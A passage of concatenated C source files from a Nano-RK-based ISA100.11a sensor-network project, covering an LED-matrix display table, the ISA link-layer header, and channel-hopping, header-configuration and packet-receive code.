{2, {{0,92,253}, {0,116,254},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //5 4
{2, {{0,126,253}, {0,112,254},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //6 5
{2, {{0,4,253}, {0,124,254},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //7 6
{2, {{0,124,253}, {0,124,254},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //8 7
{2, {{0,28,253}, {0,252,254},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //9 8
{5, {{126,0,127}, {66,0,191},{66,0,223},{82,0,239},{114,0,247},{0,0,0},{0,0,0},{0,0,0}}, 0}, //G 9
{5, {{2,0,127}, {2,0,191},{126,0,223},{2,0,239},{2,0,247},{0,0,0},{0,0,0},{0,0,0}}, 0}, //T 10
{5, {{126,0,127}, {64,0,191},{64,0,223},{64,0,239},{64,0,247},{0,0,0},{0,0,0},{0,0,0}}, 0}, //L 11
{5, {{126,0,127}, {4,0,191},{8,0,223},{16,0,239},{126,0,247},{0,0,0},{0,0,0},{0,0,0}}, 0}, //N 12
{5, {{126,0,127}, {66,0,191},{66,0,223},{66,0,239},{66,0,247},{0,0,0},{0,0,0},{0,0,0}}, 0}, //C 13
};
uint8_t charIndex; // used to store the character index
uint8_t numIndex;  // used to store the number index
nrk_time_t displayStartTime;
bool displayNeeded = false;
uint8_t toggle = 0;
/*
void spiSend(void)
{
MATRIX_CLEAR();
//Send data to the matrix
//FASTSPI_TX_WORD(emberUnsignedCommandArgument(0)); //writes 2 bytes to spi
//FASTSPI_WAIT()
FASTSPI_TX(emberUnsignedCommandArgument(0));
FASTSPI_TX(emberUnsignedCommandArgument(1));
FASTSPI_TX(emberUnsignedCommandArgument(2));
//Make the shift register output the data that we send
MATRIX_DISPLAY();
}
*/
void spiPatternSend(uint8_t p1, uint8_t p2,uint8_t p3){
MATRIX_CLEAR();
//Send data to the matrix
//FASTSPI_TX_WORD(emberUnsignedCommandArgument(0)); //writes 2 bytes to spi
//FASTSPI_WAIT()
FASTSPI_TX(p1);
FASTSPI_TX(p2);
FASTSPI_TX(p3);
//Make the shift register output the data that we send
MATRIX_DISPLAY();
}
void setNewDisplay(uint8_t cIndex, uint8_t nIndex){
	//out-of-range indexes are ignored so we never read outside matrixTable
if(nIndex<9) numIndex = nIndex;
if (cIndex > 8 && cIndex < 14) charIndex = cIndex;
nrk_time_get(&displayStartTime);
displayNeeded = true;
}
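/*
 * Usage sketch: setNewDisplay(9, 0) starts alternating the 'G' glyph
 * (table row 9) with the digit '1' (row 0) for DISPLAY_INTERVAL_SECS.
 * Out-of-range indexes are ignored, so callers elsewhere in this
 * project pass destAddr-1 directly.
 */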
void setMatrix(){
nrk_time_t currentTime;
//Do the display thing
if (displayNeeded == true){
putchar('p');
if (toggle <= 2){
spiPatternSend(matrixTable[charIndex].pattern[matrixTable[charIndex].currentIndex][0],matrixTable[charIndex].pattern[matrixTable[charIndex].currentIndex][1],matrixTable[charIndex].pattern[matrixTable[charIndex].currentIndex][2]);
toggle++ ;//= !toggle;
matrixTable[charIndex].currentIndex++;
if (matrixTable[charIndex].currentIndex >= matrixTable[charIndex].size) matrixTable[charIndex].currentIndex = 0;
}
else {
spiPatternSend(matrixTable[numIndex].pattern[matrixTable[numIndex].currentIndex][0],matrixTable[numIndex].pattern[matrixTable[numIndex].currentIndex][1],matrixTable[numIndex].pattern[matrixTable[numIndex].currentIndex][2]);
toggle = 0;//!toggle;
matrixTable[numIndex].currentIndex++;
if (matrixTable[numIndex].currentIndex >= matrixTable[numIndex].size) matrixTable[numIndex].currentIndex = 0;
}
		nrk_time_get(&currentTime);
if (currentTime.secs - displayStartTime.secs > DISPLAY_INTERVAL_SECS){
MATRIX_CLEAR();
displayNeeded = false;
}
putchar('q');
}
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/nano-RK-well-sync/src/net/isa_backup/isa.h
/******************************************************************************
* Nano-RK, a real-time operating system for sensor networks.
* Copyright (C) 2007, Real-Time and Multimedia Lab, Carnegie Mellon University
* All rights reserved.
*
* This is the Open Source Version of Nano-RK included as part of a Dual
* Licensing Model. If you are unsure which license to use please refer to:
* http://www.nanork.org/nano-RK/wiki/Licensing
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 2.0 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* Contributing Authors (specific to this file):
* <NAME>
* <NAME>
* <NAME>
*******************************************************************************/
#ifndef _ISA_H
#define _ISA_H
#include <include.h>
#include <isa_scheduler.h>
#include <basic_rf.h>
#include <nrk.h>
#include <nrk_cfg.h>
/*For isa link define */
#define MAX_ISA_GLOBAL_SLOTS 100
#define ISA_STACK_SIZE 128
#define ISA_TOKEN_TIMEOUT 10000
/* For isa link*/
typedef enum{
DHDR_INDEX=0,
DHR_INDEX=0,
SLOT_INDEX=1,
OFFSET_HIGH=1,
OFFSET_LOW=2,
PKT_DATA_START=2
} isa_pkt_field_t;
uint8_t isa_rx_data_ready;
uint8_t isa_tx_data_ready;
uint8_t DHDR;
uint16_t last_slot;
typedef struct {
int8_t length;
int8_t DHDR;
uint8_t *pPayload;
} ISA_TX_INFO;
ISA_TX_INFO isa_tx_info[ISA_SLOTS_PER_FRAME];
typedef struct {
uint16_t mac_addr;
uint8_t channel;
uint8_t power;
uint16_t tx_guard_time;
uint16_t rx_timeout;
uint8_t mobile_sync_timeout;
} isa_param_t;
isa_param_t isa_param;
typedef enum {
ISA_RECIPIENT,
ISA_REPEATER,
ISA_ROUTER
} isa_node_mode_t;
isa_node_mode_t isa_node_mode;
nrk_task_type isa_task;
/* declare task stack for storing isa tasks */
NRK_STK isa_task_stack[ISA_STACK_SIZE];
/* rx or tx structure */
RF_RX_INFO isa_rfRxInfo;
RF_TX_INFO isa_ack_tx;
uint8_t isa_ack_buf[4];
volatile RF_TX_INFO isa_rfTxInfo;
uint8_t _isa_ready; //flag indicating isa protocol is ready
/********************* config function ***********************************/
void isa_start();
void isa_task_config ();
uint8_t isa_init(isa_node_mode_t mode);
void isa_nw_task();
void isa_set_channel (uint8_t chan);
int8_t isa_ready();
int8_t configDHDR();
/********************* waiting function ***********************************/
int8_t isa_wait_until_rx_pkt ();
int8_t isa_wait_until_rx_or_tx ();
/********************* rx and tx function ***********************************/
int8_t isa_rx_pkt_set_buffer(uint8_t *buf, uint8_t size);
void _isa_rx(uint8_t slot);
int8_t isa_rx_pkt_check();
void isa_rx_pkt_release();
void _isa_tx (uint8_t slot);
int8_t isa_tx_pkt (uint8_t *tx_buf, uint8_t len, uint8_t DHDR, uint8_t slot);
uint8_t* isa_rx_pkt_get (uint8_t *len, int8_t *rssi);
/********************* rtl_scheduler.c ***********************************/
int8_t isa_set_schedule (isa_node_mode_t isa_node_mode);
int8_t isa_get_schedule (uint8_t slot);
#endif
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/src/net/isa/isa.c
/******************************************************************************
* Nano-RK, a real-time operating system for sensor networks.
* Copyright (C) 2007, Real-Time and Multimedia Lab, Carnegie Mellon University
* All rights reserved.
*
* This is the Open Source Version of Nano-RK included as part of a Dual
* Licensing Model. If you are unsure which license to use please refer to:
* http://www.nanork.org/nano-RK/wiki/Licensing
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 2.0 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* Contributing Authors (specific to this file):
* <NAME>
*******************************************************************************/
//#include <rtl_debug.h>
#include <include.h>
#include <ulib.h>
#include <avr/sleep.h>
#include <avr/wdt.h>
#include <avr/eeprom.h>
#include <stdio.h>
#include <avr/interrupt.h>
#include <nrk.h>
#include <nrk_events.h>
#include <nrk_timer.h>
#include <nrk_error.h>
//#include <rtl_defs.h>
#include <stdlib.h>
//#include <isa_scheduler.h>
#include <isa.h>
#include <isa_defs.h>
#include <isa_error.h>
#include <nrk_cfg.h>
#include <spi_matrix.h>
#define CHANNEL_HOPPING
//#define CORRECTION
//#define INIT_SYNC
#define LED_SLOT_DEBUG
//#define HIGH_TIMER_DEBUG
#define TX_RX_DEBUG
#define ACK_DEBUG
#define RX_DEBUG
#define TX_DEBUG
//#define JOIN_PROCESS
#ifdef JOIN_PROCESS
uint8_t join_pkt_buf[RF_MAX_PAYLOAD_SIZE];
#endif
/* slot related declaration */
volatile uint16_t global_slot;
volatile uint16_t current_global_slot;
volatile uint16_t global_cycle;
uint16_t last_sync_slot;
/* channel hopping related declaration */
uint8_t slottedPattern[16];
uint8_t slowPattern[3];
uint8_t currentChannel;
uint8_t channelIndex = 0;
uint8_t slowIndex;
/*used for calculating offset*/
uint16_t slot_start_time; // holds the time value in terms of HIGH_SPEED_TIMER_TICKS.
                          // Generally very close to 0 since the timer is restarted just before this is recorded
uint16_t tx_start_time; // actual transmission start time in terms of HIGH_SPEED_TIMER_TICKS
uint16_t rx_start_time; // actual reception start time in terms of HIGH_SPEED_TIMER_TICKS
uint16_t offsetY; // tx_start_time - slot_start_time (used for time correction)
uint16_t offsetX; // rx_start_time - slot_start_time (used for time correction)
/* SYNC related declaration */
uint8_t _isa_sync_ok;
uint8_t AFTER_FIRST_SYNC;
uint16_t EXPIRATION = 200; // each slot lasts 10ms, so 200 slots last 2s without a sync
uint16_t slot_expired;
uint8_t previous_tx_slot;
/* signal related declaration */
int8_t isa_tx_done_signal;
int8_t isa_rx_pkt_signal;
uint8_t adv_buf[RF_MAX_PAYLOAD_SIZE];
/* header type */
//uint8_t DMXHR[4]; //Data link layer media access control extension sub header, mainly used for security control
uint8_t DAUX[29]; //Data link layer auxiliary sub-header, currently used for join process
//uint8_t DROUT[3]; //Routing sub-header, compressed variant
//uint8_t DADDR[5]; //Addressing sub-header
uint8_t DHR; // ACK's data link layer header
/* Test variable */
uint8_t tmp_curSec;
uint8_t tmp_offsetSec;
int16_t tmp_offsetNanoSec;
uint16_t tmp_count=0;
uint16_t DHDRcount = 0;
uint16_t txCount = 0; //Holds the number of packets transmitted successfully
uint16_t rxCount = 0; // Holds the number of packets received successfully
uint16_t packetsLost = 0; //Holds packets lost (receive + ACK )
uint8_t check = 0;
// Search for "Vignesh" to find all additions made for advertisements
uint16_t adjacencyMatrix[DLMO_NEIGHBOR_MAX_COUNT];
void config_child_list (uint8_t node_id)
{
child_list |= ((uint32_t) 1) << node_id;
}
/**
* isa_set_channel()
*
* This function set channel and is used for channel hopping.
*
*/
void isa_set_channel (uint8_t chan)
{
isa_param.channel = chan;
rf_set_channel (chan);
}
/*------------------------------------------------- isa_get_channel() -----
| Function isa_get_channel()
|
| Purpose: Returns the current channel that the radio is set to operate
| on. This will return the channel that was last set using isa_set_channel()
|
| Parameters:
| NONE
|
| Returns: uint8_t channel value
*-------------------------------------------------------------------*/
uint8_t isa_get_channel()
{
return isa_param.channel;
}
void isa_set_channel_pattern(uint8_t pattern)
{
switch (pattern)
{
case 1:
slottedPattern[0] = 19;
slottedPattern[1] = 12;
slottedPattern[2] = 20;
slottedPattern[3] = 24;
slottedPattern[4] = 16;
slottedPattern[5] = 23;
slottedPattern[6] = 18;
slottedPattern[7] = 25;
slottedPattern[8] = 14;
slottedPattern[9] = 21;
slottedPattern[10] = 11;
slottedPattern[11] = 15;
slottedPattern[12] = 22;
slottedPattern[13] = 17;
slottedPattern[14] = 13;
slottedPattern[15] = 26;
break;
case 3:
slowPattern[0]=15;
slowPattern[1]=20;
slowPattern[2]=25;
break;
default:
break;
}
}
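/*
 * Editor's sketch (guarded out of the build): how the slotted-hopping
 * channel is derived each wakeup, mirroring isa_nw_task() below.
 * The & 0x0F mask wraps the 16-entry slottedPattern without a modulo.
 */
#ifdef DOC_EXAMPLE_HOPPING
uint8_t next_hop_channel (uint8_t index, uint16_t slot_offset)
{
    /* advance the pattern index by the number of slots slept through */
    index += slot_offset;
    return slottedPattern[index & 0x0F]; /* wrap at 16 entries */
}
#endif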
int8_t isa_ready()
{
if (_isa_ready == 1)
return NRK_OK;
else
return NRK_ERROR;
}
int8_t isa_rx_pkt_set_buffer(uint8_t *buf, uint8_t size)
{
if(size==0 || buf==NULL) return NRK_ERROR;
isa_rfRxInfo.pPayload = buf;
isa_rfRxInfo.max_length = size;
return NRK_OK;
}
int8_t isa_wait_until_rx_pkt()
{
nrk_signal_register(isa_rx_pkt_signal);
if (isa_rx_pkt_check() != 0)
return NRK_OK;
nrk_event_wait (SIG(isa_rx_pkt_signal));
return NRK_OK;
}
int8_t isa_wait_until_rx_or_tx ()
{
nrk_signal_register(isa_rx_pkt_signal);
nrk_signal_register(isa_tx_done_signal);
nrk_event_wait (SIG(isa_rx_pkt_signal) | SIG(isa_tx_done_signal));
return NRK_OK;
}
/**
* isa_init()
*
* This function sets up the low level link layer parameters.
* This starts the main timer routine that will then automatically
* trigger whenever a packet might be sent or received.
* This should be called before ANY scheduling information is set
* since it will clear some default values.
*
*/
uint8_t isa_init (isa_node_mode_t mode, uint8_t id, uint8_t src_id)
{
uint8_t i;
/* Generate signals */
isa_rx_pkt_signal=nrk_signal_create();
if(isa_rx_pkt_signal==NRK_ERROR){
nrk_kprintf(PSTR("ISA ERROR: creating rx signal failed\r\n"));
nrk_kernel_error_add(NRK_SIGNAL_CREATE_ERROR,nrk_cur_task_TCB->task_ID);
return NRK_ERROR;
}
isa_tx_done_signal=nrk_signal_create();
if(isa_tx_done_signal==NRK_ERROR){
nrk_kprintf(PSTR("ISA ERROR: creating tx signal failed\r\n"));
nrk_kernel_error_add(NRK_SIGNAL_CREATE_ERROR,nrk_cur_task_TCB->task_ID);
return NRK_ERROR;
}
// No buffer to start with
isa_rfRxInfo.pPayload = NULL;
isa_rfRxInfo.max_length = 0;
/*FIXME Actually we dont need to always run the high speed timer */
_nrk_high_speed_timer_start();
/* clear everything out */
global_cycle = 0;
global_slot = MAX_ISA_GLOBAL_SLOTS;
_isa_sync_ok = 0;
_isa_join_ok = 0;
slot_expired = 0;
isa_node_mode = mode;
isa_id = id;//change
dmo.dlAddress = id;
isa_clk_src_id=src_id; //change
isa_rx_data_ready = 0;
isa_param.mobile_sync_timeout = 100;
isa_param.rx_timeout = 8000; // 8000 *.125us = 1ms
isa_param.tx_guard_time = TX_GUARD_TIME;
isa_param.channel = 15;
isa_param.mac_addr = 0x1981;
/*
for (i = 0; i < ISA_SLOTS_PER_FRAME; i++) {
isa_sched[i] = 0;
}
isa_tdma_rx_mask = 0;
isa_tdma_tx_mask = 0;
*/
/* Setup the cc2420 chip */
rf_init (&isa_rfRxInfo, isa_param.channel, 0x2421, isa_param.mac_addr);
AFTER_FIRST_SYNC = 1;
/* Setup fisrt hopping channel */
#ifdef CHANNEL_HOPPING
slowIndex=0;
if(id!=1){
channelIndex = src_id;
currentChannel = slottedPattern[channelIndex];
}else{
channelIndex = 0;
currentChannel = slottedPattern[channelIndex];
}
isa_set_channel(currentChannel);
#endif
#ifdef JOIN_PROCESS
if(mode==ISA_GATEWAY){
for(i=22;i<=24;i++){
isa_tx_info[i].pPayload = join_pkt_buf;
	    isa_tx_info[i].length = PKT_DATA_START+1; // pass the pointer
isa_tx_info[i].DHDR = configDHDR();
isa_tx_data_ready |= ((uint32_t) 1 << i); // set the flag
}
}
#endif
resync_times=0;
dlmoInit(); //Initialize the dlmo data structure
return NRK_OK;
}
void isa_start ()
{
//_isa_clear_sched_cache ();
_isa_ready = 2;
}
/*------------------------------------------------- configDHDR() -----
| Function configDHDR()
|
| Purpose: Configures the DHDR header
|
| Bit - Description
 |  1:0 - DL version (Always 01)
| 2 - Clock recipient 0 - Not DL clock recipient
| 1 - DL clock recipient
| 3 - Include slow hopping offset 0 - no
| 1 - yes
| 4 - Include DAUX 0 - no
| 1 - yes
| 5 - Request EUI-64 0 - no
| 1 - yes
| 6 - Signal Quality is ACK 0 - no
| 1 - yes
| 7 - ACK needed 0 - no ACK/NACK
| 1 - ACK/NACK expected
|
| The configuration of bits in the DHDR header is done based on
| link and neighbor information
|
| Parameters:
| (IN)DLMO_LINK * link - pointer to the link data structure that is used for the current slot
|
| Returns: DHDR
*-------------------------------------------------------------------*/
int8_t configDHDR(DLMO_LINK * link)
{
int8_t DHDR = 1; //lower two bits are always 01
if(link->linkType == TX_NO_ADV){//request ACK/NACK for a TX link only
DHDR |= 1<<7;
}
if(1){//request signal quality in ACK
DHDR |= 1<<6;
}
if(1){//request EUI
DHDR |= 1<<5;
}
if(link->linkType == ADV){//include DAUX if this is an ADV link
DHDR |= 1<<4;
}
if(0){//include slow hopping offset
DHDR |= 1<<3;
}
if(ISAMASK(link->neighbor->typeInfo, CLOCK_PREFERRED) == CLOCK_PREFERRED){ //is clock recipient
/*
* The link points to a neighbor that is configured
* for it. This checks if that neighbor is our clock source or not.
* If it is, then we should request for clock correction
*/
DHDR |= 1<<2;
}
return DHDR;
}
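/*
 * Editor's sketch (guarded out of the build): decoding DHDR on the
 * receive side, matching the bit layout documented above. Only the
 * bits actually tested elsewhere in this file are shown.
 */
#ifdef DOC_EXAMPLE_DHDR
void dhdr_decode_example (uint8_t dhdr)
{
    uint8_t ack_needed   = (dhdr >> 7) & 1; /* ACK/NACK expected */
    uint8_t want_quality = (dhdr >> 6) & 1; /* signal quality in ACK */
    uint8_t want_eui     = (dhdr >> 5) & 1; /* EUI-64 requested */
    uint8_t has_daux     = (dhdr >> 4) & 1; /* DAUX present (ADV link) */
    uint8_t clock_recip  = (dhdr >> 2) & 1; /* clock correction wanted */
    printf ("ack=%d q=%d eui=%d daux=%d clk=%d\r\n",
            ack_needed, want_quality, want_eui, has_daux, clock_recip);
}
#endif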
/*------------------------------------------------- configDHR() -----
| Function configDHR()
|
| Purpose: Configures the DHR header
|
| Bit - Description
 |  1:0 - Reserved (Always 11)
| 2 - Reserved (0)
| 3 - Auxiliary sub-header 0 - no DAUX
| 1 - DAUX inlcuded
 |  5:4 - ACK/NACK type               0 - ACK
| 1 - ACK/ECN
| 2 - NACK0
| 3 - NACK1
| 6 - Include slow hopping timeslot 0 - no
| offset 1 - yes
|
| 7 - Include clock correction 0 - no
| 1 - yes
|
 |   This configures the DHR header based on the incoming message's DHDR header. If we are providing clock correction,
 |   the clock correction bit is set. The rest is yet to be implemented.
|
| Parameters:
| (IN)clockCorrection - used to decide whether to set the clock correction bit
| (IN)nack - used to set the ACK/NACK(54) bits
|
| Returns: DHDR
*-------------------------------------------------------------------*/
int8_t configDHR(uint8_t clockCorrection,uint8_t nack)
{
int8_t DHR = 3;
if(clockCorrection){//include clock correction change
DHR |= 1<<7;
}
if(0){//including slow-hopping timeslot offset
DHR |= 1<<6;
}
DHR |= nack<<4; //what type of ACK/NACK is this?
if(0){//include slow hopping offset
DHR |= 1<<3;
}
return DHR;
}
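/*
 * Worked example: configDHR(1,3) builds a NACK1 with clock correction,
 * i.e. base 0x03 | 1<<7 (correction) | 3<<4 (NACK1) = 0xB3. A plain
 * ACK without correction is configDHR(0,0) = 0x03.
 */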
/**
* configAdvDAUX()
*
 * The gateway configures the DAUX sub-header, which carries
 * superframe and join information for advertisements.
*
*/
void configAdvDAUX(uint8_t chPattern, uint8_t chIndex, uint8_t sp_period, uint8_t tx_slot1, uint8_t tx_slot2, uint8_t tx_slot3, uint8_t tx_slot4, uint8_t rx_slot1, uint8_t rx_slot2, uint8_t rx_slot3, uint8_t rx_slot4)
{
/*ADVERTISEMENT SELECTION*/
DAUX[0]=0; // Advertisement selection, 0 indicates advertisement DAUX
/*TIME SYNCHRONIZATION*/
/* 1-6 bytes are reserved for time synchronization */
/*SUPERFRAME INFORMATION*/
DAUX[7]=10; // timeslot duration, currently not used.
DAUX[8]=0; // reserved for long timeslot duration
DAUX[9]=chPattern; // channel pattern selection
DAUX[10]=chIndex; // channel index selection
DAUX[11]=sp_period; // superframe period
DAUX[12]=0; // reserved for long period situation
/* 13 reserved for superframe cycle starting point
14 reserved of the length of slow hopping period
15 and 16 reserved for channel hopping channel map for spectrum management
*/
/*JOIN INFORMATION*/
/* 17 reserved for Join backoff and timeout
18 reserved for Indicates fields that are transmitted
*/
DAUX[19]=tx_slot1; //TX slot 1
DAUX[20]=tx_slot2; //TX slot 2
DAUX[21]=tx_slot3; //TX slot 3
DAUX[22]=tx_slot4; //TX slot 4
DAUX[23]=rx_slot1; //RX slot 1
DAUX[24]=rx_slot2; //RX slot 2
DAUX[25]=rx_slot3; //RX slot 3
DAUX[26]=rx_slot4; //RX slot 4
/*INTEGRETY CHECK*/
/* 27 and 28 are reserved for Integrety check*/
}
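/*
 * Usage sketch (illustrative values only): advertise channel pattern 1
 * starting at index 0 with a 25-slot superframe, offering TX join
 * slots 5/6 and RX join slots 7/8; unused slots are passed as 0,
 * which the join parser treats as "stop".
 *
 *   configAdvDAUX (1, 0, 25, 5, 6, 0, 0, 7, 8, 0, 0);
 */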
/**
* isa_check_rx_status()
*
 * This function returns whether there is a packet in the link layer
 * rx buffer. Once a packet has been received, it should be quickly
 * processed or moved, and then isa_rx_pkt_release() should be called.
 * isa_rx_pkt_release() then resets the value of isa_rx_pkt_check().
*
* Returns: 1 if a new packet was received, 0 otherwise
*/
int8_t isa_rx_pkt_check()
{
return isa_rx_data_ready;
}
/**
* isa_rx_pkt_get()
*
 * This function returns the rx buffer pointer. It should be called
 * once a packet is received and must be followed by isa_rx_pkt_release(),
 * which resets the value of isa_rx_pkt_check().
 *
 * Returns: rx buffer pointer
*/
uint8_t* isa_rx_pkt_get (uint8_t *len, int8_t *rssi)
{
if(isa_rx_pkt_check()==0){
*len=0;
*rssi=0;
return NULL;
}
*len=isa_rfRxInfo.length;
*rssi=isa_rfRxInfo.rssi;
return isa_rfRxInfo.pPayload;
}
/**
* _isa_rx()
*
* This is the low level RX packet function. It will read in
* a packet and buffer it in the link layer's single RX buffer.
 * This buffer can be checked with isa_rx_pkt_check() and
 * released with isa_rx_pkt_release(). If the buffer has not
* been released and a new packet arrives, the packet will be lost.
 * This function is only called from the slot timer path in isa_nw_task().
*
* Arguments: slot is the current slot that is actively in RX mode.
*/
void _isa_rx (DLMO_LINK * link, uint8_t slot)
{
uint8_t DHDR; // Data link layer header sub-header, currently used as ACK control
NEIGHBOR_TABLE* neighborTable;
CONFIG_NEIGHBOR* configNeighbor;
CONFIG_GRAPH* configGraph;
CONFIG_LINK* configLink;
CANDIDATE* candidate;
uint8_t i;
//putchar('R');
uint8_t n;
uint32_t node_mask;
uint16_t destAddr;
volatile uint8_t timeout;
MESSAGE* message;
bool TransmitLinkPresent = false;
uint8_t nack = 0;// NACK
#ifdef LED_DEBUG
nrk_led_set(1);
#endif
rf_set_rx (&isa_rfRxInfo, isa_param.channel); // sets rx buffer and channel
rf_polling_rx_on ();
nrk_gpio_set(NRK_DEBUG_2);
// Timing for waiting for sfd
timeout = _nrk_os_timer_get();
timeout+=4; // 4ms
n = 0;
//nrk_gpio_set(NRK_DEBUG_3);
while ((n = rf_rx_check_sfd()) == 0) {
if (_nrk_os_timer_get() > timeout) {
//spend too much time on waiting for a pkt's arrival
nrk_gpio_clr(NRK_DEBUG_2);
rf_rx_off ();
#ifdef LED_DEBUG
nrk_led_clr(1);
#endif
#ifdef RX_DEBUG
// nrk_gpio_set(NRK_DEBUG_2);
// nrk_gpio_clr(NRK_DEBUG_2);
//putchar('v');
//printf("%d", slot);
//printf("sfd times out.\n\r");
#endif
// packetsLost++;
return;
}
}
//printf("%d\n\r",_nrk_high_speed_timer_get());
// sfd received, start receiving packet and record start time
rx_start_time = _nrk_high_speed_timer_get();
//nrk_gpio_set(NRK_DEBUG_1);
// nrk_gpio_clr(NRK_DEBUG_1);
// Timing for waiting for finishing packet receiving
timeout = _nrk_os_timer_get();
timeout += 5; // 5ms
if (n != 0) {
n = 0;
// printf("Packet on its way\n\r");
while ((n = rf_polling_rx_packet (false,128)) == 0) {
//printf("%d\n\r",_nrk_os_timer_get());
if (_nrk_os_timer_get () > timeout) {
#ifdef RX_DEBUG
printf("packet is too long, times out.\n\r");
#endif
// packetsLost++;
// spend too much time on receiving pkt.
return; // huge timeout as fail safe
}
}
}
nrk_gpio_clr(NRK_DEBUG_2);
// printf("%d", currentChannel);
rf_rx_off ();
if (n !=1){ //size of packet must have been wrong
putchar('b');
printf("Channel %d\r\n",currentChannel);
// packetsLost++;
}
if (n == 1) {// successfully received packet
rxCount++;
nrk_led_toggle(BLUE_LED);
//If I am the destination
destAddr = isa_rfRxInfo.pPayload[DEST_INDEX];
//potential problem: if repeater or recipient receives noise, the DHDR would be changed. And it is highly possible that the highest bit of DHDR would be set to 0
//if(isa_node_mode != ISA_GATEWAY)
DHDR = isa_rfRxInfo.pPayload[DHDR_INDEX];
	message = (MESSAGE *) &isa_rfRxInfo.pPayload[PKT_DATA_START]; // cast the raw payload to the message struct
#ifdef RX_DEBUG
// printf("Repeater slot = %d, local slot is %d.\n\r", isa_rfRxInfo.pPayload[SLOT_INDEX],global_slot);
#endif // RX_DEBUG
nrk_event_signal(isa_rx_pkt_signal);
node_mask = ((uint32_t) 1) << isa_rfRxInfo.pPayload[SRC_INDEX];
if(DHDR & (1<<4))// if advertisement, add into candidate table and return
{
//printf("S:%d\r\n",isa_rfRxInfo.pPayload[SRC_INDEX]);
//putchar('w');
if (addCandidate(isa_rfRxInfo.pPayload[SRC_INDEX]) == ISA_ERROR){
printIsaError();
}
isa_rx_pkt_release();
return;
//printf("Received advertisement \r\n");
}
else if(DHDR & (1<<7)){ //if ACK is required
txCount++;
// Transmit ACK packet
//If the packet is meant for me or to a node I have a transmit link to, I send an acknowledge
if((TransmitLinkPresent=isTransmitLinkPresent(isa_rfRxInfo.pPayload)) || (dmo.dlAddress == destAddr))
{
nack = 0;
}
else
{
nack = 3; // NACK1 because of difficulties downstream
}
DHR = configDHR(DHDR & (1<<2),nack); //configure DHRto include clock correction based on the DHDR bit
// printf("%d", DHR);
isa_ack_buf[DHR_INDEX]= DHR;
#ifdef ACK_DEBUG
//printf("DHDR is %x.\n\r",DHDR);
#endif
isa_ack_tx.pPayload = isa_ack_buf;
if (DHDR & (1<<2)) { //reply ACK with time offsetX
// putchar ('K');
offsetX = rx_start_time - slot_start_time;
//printf("slot_start_time is %d,rx_start_time is %d.\n\r",slot_start_time,rx_start_time);
uint8_t temp1,temp2;
temp1 = (offsetX & 0xFF00)>>8;
isa_ack_buf[OFFSET_HIGH]=temp1;
temp2 = (offsetX & 0x00FF);
isa_ack_buf[OFFSET_LOW]=temp2;
#ifdef ACK_DEBUG
// printf("offsetX is %d\n\r", offsetX);
#endif
//isa_ack_tx.length = PKT_DATA_START + 1;
isa_ack_tx.length = 4;
}
else
{ // recipient , only reply explicit ACK
//isa_ack_tx.length = PKT_DATA_START-1;
isa_ack_tx.length = 2;
//putchar ('C');
//putchar('\n');
}
nrk_gpio_set(NRK_DEBUG_2);
rf_tx_tdma_packet (&isa_ack_tx,slot_start_time,isa_param.tx_guard_time,&tx_start_time);
nrk_gpio_clr(NRK_DEBUG_2);
// printf ("Tx :%d| ", isa_rfRxInfo.length);
}
//This will be a normal TX packet if we have reached this point
//If it is a neighbor table report then we can forward it to our clock source
//If I am the gateway then I don't forward it to anyone
if (message->type == DUMMY_PAYLOAD){
if (destAddr == dmo.dlAddress) {
dd_data_indication(isa_rfRxInfo.pPayload[SRC_INDEX] , destAddr,0,0, 0, 0, isa_rfRxInfo.pPayload);
}
else{
//if the dest address is not mine, then add into the queue to forward provided we have a link to forward for that graph. If a graph is not
// configured in the message then we should at least have a link to the dest neighbor
// if (isTransmitLinkPresent(isa_rfRxInfo.pPayload)){
//if yes, then place the message on the Queue again
if(TransmitLinkPresent == true){
enQueue (destAddr, 0, isa_rfRxInfo.length, isa_rfRxInfo.pPayload, NULL);
printf("packet forwarded to %d\r\n", destAddr);
isa_rx_pkt_release();
}
else{
printf("No Transmit Link for this test message for %d - dropped\r\n", destAddr);
isa_rx_pkt_release();
}
}
}
else if (message->type==ADD_NEIGHBOR)
{
           // printf("Received configure Neighbor data from %d\r\n",isa_rfRxInfo.pPayload[SRC_INDEX]);
if(destAddr == dmo.dlAddress)
{
                configNeighbor = (CONFIG_NEIGHBOR *) &message->data;
addNeighbor(configNeighbor->neighborId,0,0,0,false,0,0,0);
isa_rx_pkt_release();
setNewDisplay(12, destAddr-1);
}
else
{
//if (isTransmitLinkPresent(isa_rfRxInfo.pPayload)){
if(TransmitLinkPresent == true){
//if yes, then place the message on the Queue again
enQueue (destAddr, 0, isa_rfRxInfo.length, isa_rfRxInfo.pPayload, NULL);
// printf("packet forwarded to %d", destAddr);
isa_rx_pkt_release();
setNewDisplay(12, destAddr-1);
}
else{
printf("No Transmit Link for Add Neighbor Message for %d- dropped\r\n", destAddr);
isa_rx_pkt_release();
}
}
}
else if(message->type==ADD_GRAPH)
{
           // printf("Received configure Graph data from %d\r\n",isa_rfRxInfo.pPayload[SRC_INDEX]);
if(destAddr == dmo.dlAddress)
{
                configGraph = (CONFIG_GRAPH *) &message->data;
addGraph(configGraph->graphId,configGraph->neighborCount,configGraph->neigh1,configGraph->neigh2,configGraph->neigh3);
isa_rx_pkt_release();
